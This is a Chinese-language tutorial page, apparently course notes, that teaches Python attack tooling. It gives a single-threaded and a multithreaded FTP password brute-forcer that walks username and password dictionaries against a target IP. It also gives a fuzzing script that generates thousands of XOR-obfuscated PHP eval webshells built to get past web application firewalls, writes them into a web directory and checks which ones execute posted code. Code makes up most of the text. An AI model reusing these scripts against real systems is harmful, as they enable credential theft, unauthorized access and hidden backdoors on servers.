Python开发-多线程Fuzz&Waf异或免杀&爆破
- 本课知识点:协议模块使用,Request爬虫技术,简易多线程技术,编码技术,Bypass后门技术
- 学习目的:掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合Fuzz吊打WAF等
利用FTP模块实现协议爆破脚本
- ftplib模块使用
- 遍历用户及密码字典
- 尝试连接执行命令判断
# Author:Serena
import ftplib
#简单的模拟登录测试
#爆破:IP、端口、用户名、密码字典
def ftp_brute():
ftp = ftplib.FTP()
for username in open('ftp-user.txt'):
for password in open('ftp-pwd.txt'):
username = username.replace('\n','')
password = password.replace('\n','')
# print(username+'|'+password)
try:
ftp.connect('192.168.56.110', 21)
ftp.login(username,password)
print(username+'|'+password+'| ok')
list = ftp.retrlines('list') #此时可以获得当前ftp目录下的所有文件的信息
print(list)
except ftplib.all_errors:
pass
if __name__ == '__main__':
ftp_brute()多线程
# Author:Serena
import ftplib,sys,queue,threading
#简单的模拟登录测试
#爆破:IP、端口、用户名、密码字典
import queue
import threading
def ftp_brute(ip,port):
ftp = ftplib.FTP()
ftp.connect(ip,port)
while not q.empty():
dict = q.get()
dict = dict.split('|')
username = dict[0]
password = dict[1]
try:
ftp.login(username,password)
print(username+'|'+password+'| ok')
list = ftp.retrlines('list') #此时可以获得当前ftp目录下的所有文件的信息
print(list)
except ftplib.all_errors:
print(username + '|' + password + '| no')
pass
if __name__ == '__main__':
ip = sys.argv[1]
port = int(sys.argv[2])
userfile = sys.argv[3]
passfile = sys.argv[4]
threading_num = int(sys.argv[5])
q = queue.Queue()
for username in open(userfile):
for password in open(passfile):
username = username.replace('\n','')
password = password.replace('\n','')
# print(username+'|'+password)
q.put(username + '|' + password)
for x in range(threading_num):
t = threading.Thread(target=ftp_brute,args=(ip,port))
t.start()
# 命令行执行:python3 test.py 192.168.56.110 21 ftp-user.txt ftp-pwd.txt 10
# 可以再优化一下:检测到争取的用户名密码后停止配合Fuzz实现免杀异或shell脚本
- 免杀异或shell原理讲解及开发思路(参考及举例:!^@,"^?等)
- 基于Fuzz思路生成大量Payload代码并有序命名写入网站文件中
- 基于多线程实现批量访问shell文件并提交测试是否正常连接回显
# Author:Serena
import time
import requests
import threading,queue
def bypass_check():
while not q.empty():
filename = q.get()
url = "http://127.0.0.1:8081/x/" + filename
datas = {
'x ': 'phpinfo();'
}
result = requests.post(url, data=datas).content.decode('utf-8')
if "XIAODI-PC" in result:
print('check ->' + filename+'->ok')
else:
print('check ->' + filename + '->no')
time.sleep(1)
if __name__ == '__main__':
q = queue.Queue()
for i in range(1,127):
for ii in range(1, 127):
payload = "'" + chr(i) + "'" + "^" + "'" + chr(ii) + "'"
code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
filename = str(i) + 'xd' + str(ii) + '.php'
q.put(filename)
with open('D:/phpstudy/WWW/x/' + filename, 'a+') as f:
f.write(code)
print("Fuzz文件生成成功")
for x in range(20):
t = threading.Thread(target=bypass_check)
t.start()资源
- fuzzdb(https://github.com/zhanye/fuzzdb)
- fuzzDicts(https://github.com/stemmm/fuzzDicts)
- Webshell免杀绕过waf(https://www.cnblogs.com/liujizhou/p/11806497.html)
- python ftplib模块(https://www.cnblogs.com/kaituorensheng/p/4480512.html)
- PHP异或(https://blog.csdn.net/qq_41617034/article/details/104441032)
Alipay
Wechat
最后一次更新于2022-06-13 13:41
0 条评论